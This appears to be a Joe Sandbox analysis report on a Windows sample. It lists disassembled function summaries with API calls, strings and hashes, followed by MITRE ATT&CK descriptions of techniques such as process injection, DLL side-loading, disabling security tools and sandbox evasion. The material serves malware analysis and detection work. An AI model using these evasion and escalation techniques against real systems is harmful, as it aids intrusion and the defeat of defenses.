Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 591247cc7a633e05d26ee1b61df50675664a458837419e86f026f1ebd96f2548
Instruction ID: 04fa7f6e79904c73475d7d02fee32304fde2e1acaedd260bf54a928fb7d81222
Opcode Fuzzy Hash: 591247cc7a633e05d26ee1b61df50675664a458837419e86f026f1ebd96f2548
Instruction Fuzzy Hash: F1212C72610209AFDF04DFA8DC45EFA7BA8FB09315F044629F955D3250D635E850EB60

Function 00F86920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F869B1

Strings

edit, xrefs: 00F86986

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 70db0f24447c94cd9a091f2b1b151938a4456bd80933a9a51e62a70a2ee7a8a3
Instruction ID: 616a85aa93a99bc3ffdbcb32d4eeb3bc73513c6db5f2a8f0a4f440bffe58d5f0
Opcode Fuzzy Hash: 70db0f24447c94cd9a091f2b1b151938a4456bd80933a9a51e62a70a2ee7a8a3
Instruction Fuzzy Hash: 64116A71910208AFEB10AF649C45AEB37A9EB053B4F604724F9A5D71E0C635DC94B760

Function 00F629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F62A41

Strings

0, xrefs: 00F62A18

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: b26c0256bc388f6704f1c0c173301c959c42b8d0af987833de846fc609746c33
Instruction ID: b4cc3336d628ed3d4d64102615ca218bc3fd47faead9477d43aca9bc9b2a5f18
Opcode Fuzzy Hash: b26c0256bc388f6704f1c0c173301c959c42b8d0af987833de846fc609746c33
Instruction Fuzzy Hash: A611D032D01918ABCB70DFD8DC45BEA73B8AB46324F044021E895F7290D7B8AD0AE791

Function 00F721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F72255

Strings

<local>, xrefs: 00F7221D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 9114bdca77d19cfed1c947f6efc5f8bea1bbcd77d03c2a835489dfdc452ff962
Instruction ID: 60d5e98ad324e8df36e764905d17f2810089ee6044ca436e58bdc20196ef870a
Opcode Fuzzy Hash: 9114bdca77d19cfed1c947f6efc5f8bea1bbcd77d03c2a835489dfdc452ff962
Instruction Fuzzy Hash: 2E11C170A01225BAEB248F118C84EFABBA8FB06361F10C22BF51886001D3709954E6F2

Function 00F58E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F58E73

Strings

ListBox, xrefs: 00F58E3D
ComboBox, xrefs: 00F58E12

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 694185d1ca3cdfc0251d82467310fc26482895347608387cc27337d508214397
Instruction ID: 084122e8b326da37413ccbe51db68cc2dcaf02baf5ed63b19bb8667843a430a0
Opcode Fuzzy Hash: 694185d1ca3cdfc0251d82467310fc26482895347608387cc27337d508214397
Instruction Fuzzy Hash: 9701F171A01218AFCF14FBE0CC429FE7369AF02360B100A19BD21672E1EE39980CFA50

Function 00F68D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F68DAC
__fread_nolock.LIBCMT ref: 00F68DC1

Strings

EA06, xrefs: 00F68DF3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: da185d2b61cdbfee754045d54b36ef5face98b7052f8770ef4714e1c0941aea9
Instruction ID: 3674e5b18de66fd917611e435dc40c552112d2d4f76d14ccfaa860b68999143d
Opcode Fuzzy Hash: da185d2b61cdbfee754045d54b36ef5face98b7052f8770ef4714e1c0941aea9
Instruction Fuzzy Hash: 4601F972C042287FDB18CAA8DC16EFE7BFCDB11711F00419EF552D2181E878E6049B60

Function 00F58CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00F58D6B

Strings

ListBox, xrefs: 00F58D35
ComboBox, xrefs: 00F58D0A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6756c0e9a2a8ba0d1bfb7c798d28f9b433002aec5ee63b1a59c98f10d88022b5
Instruction ID: 7dfc0222265b760ed210c9b65325303dd9d57acbffb1a4c3e7b0657f83b7129a
Opcode Fuzzy Hash: 6756c0e9a2a8ba0d1bfb7c798d28f9b433002aec5ee63b1a59c98f10d88022b5
Instruction Fuzzy Hash: 2201B171A41208ABCF14FBA0CD52AFE73A89F15351F100019BA05B72D1DE289A0CB661

Function 00F58D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00F58DEE

Strings

ListBox, xrefs: 00F58DBA
ComboBox, xrefs: 00F58D8F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e34081225d63438e5ec48958090ba4cce2af3147b824749ff7755e26cde3a21b
Instruction ID: 71cd173d81ff4832516f4d1453d84c0946e1ac492faf5383c1b2ddb21403a1ae
Opcode Fuzzy Hash: e34081225d63438e5ec48958090ba4cce2af3147b824749ff7755e26cde3a21b
Instruction Fuzzy Hash: BC018F72A41209ABDB11FAA4CD42AFE77A89B11351F200115BD05B32D2DA299E1DF6B2

Function 00F64F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F64F46
_wcscmp.LIBCMT ref: 00F64F58

Strings

#32770, xrefs: 00F64F52

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 478fb6e2feecfde065329191210008e907abeea24d79542087ce53d872e6954a
Instruction ID: 9dd1917b9f38969ef1e31dbaeaf35e7b9cb63b3ab11a5711deb76a7d5f22130e
Opcode Fuzzy Hash: 478fb6e2feecfde065329191210008e907abeea24d79542087ce53d872e6954a
Instruction Fuzzy Hash: DAE0D13260423D2BE7209B55AC46FE7F7ACDB55B70F150057FD04D3051D560AA45D7E1

Function 00F3B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F3B314: _memset.LIBCMT ref: 00F3B321

Part of subcall function 00F20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F3B2F0,?,?,?,00F0100A), ref: 00F20945

IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F3B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F3B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3B2FE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: c35c51c3c23cbde87c34700ea695bf2fa71e89695c1f362947903c86a5739099
Instruction ID: 2274334b46ebe26682e2c103d1849c7eebb8d799e6ea1fe3fbca7a7ae817ba73
Opcode Fuzzy Hash: c35c51c3c23cbde87c34700ea695bf2fa71e89695c1f362947903c86a5739099
Instruction Fuzzy Hash: 70E092B02007208FD760EF28E9047827BE4AF00724F00892CE446C7341EBB4E488EBA1

Function 00F41935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00F41775

Part of subcall function 00F7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F4195E,?), ref: 00F7BFFE
Part of subcall function 00F7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F7C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F4196D

Strings

WIN_XPe, xrefs: 00F41788

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 2b15cae1243f1daf39341146dac39eeb6710a2622464d6009b4a72e1d33d1320
Instruction ID: 8fca30570b87097e7739fec06d6046ba9ba3b5352ca5433f5c0bd07c8cb7d9ef
Opcode Fuzzy Hash: 2b15cae1243f1daf39341146dac39eeb6710a2622464d6009b4a72e1d33d1320
Instruction Fuzzy Hash: BDF0C97180410DDFDB15DB91CA88BECBBF8BB08305F640095E516A2090D7755F88FF65

Function 00F85998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F859AE
PostMessageW.USER32(00000000), ref: 00F859B5

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Strings

Shell_TrayWnd, xrefs: 00F859A7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 74094b084d60d7e83c711d47a34b0d5ff704315d4b8dcc312e2fc97774b29c15
Instruction ID: 98de7ec8839aa33a3252a6413624475c3b64922efb49c9828afa13f50ddc632d
Opcode Fuzzy Hash: 74094b084d60d7e83c711d47a34b0d5ff704315d4b8dcc312e2fc97774b29c15
Instruction Fuzzy Hash: 7BD0C9313803157AE664BB709C0FFE67A14AB44B50F040825B246AA1D0D9E4A804DB54

Function 00F85964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F8596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F85981

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Strings

Shell_TrayWnd, xrefs: 00F85967

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0622d73958480cd4739fae2a1cb21b1d67c6748e171340672d9c5af276b1d09d
Instruction ID: 7497ebeee904b9dbf32ddee99b37047397451785935911140e93307e25ebab25
Opcode Fuzzy Hash: 0622d73958480cd4739fae2a1cb21b1d67c6748e171340672d9c5af276b1d09d
Instruction Fuzzy Hash: A0D0C931384315BAE664BB709C1FFE67A14AB40B50F040825B24AAA1D0D9E4A804DB54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
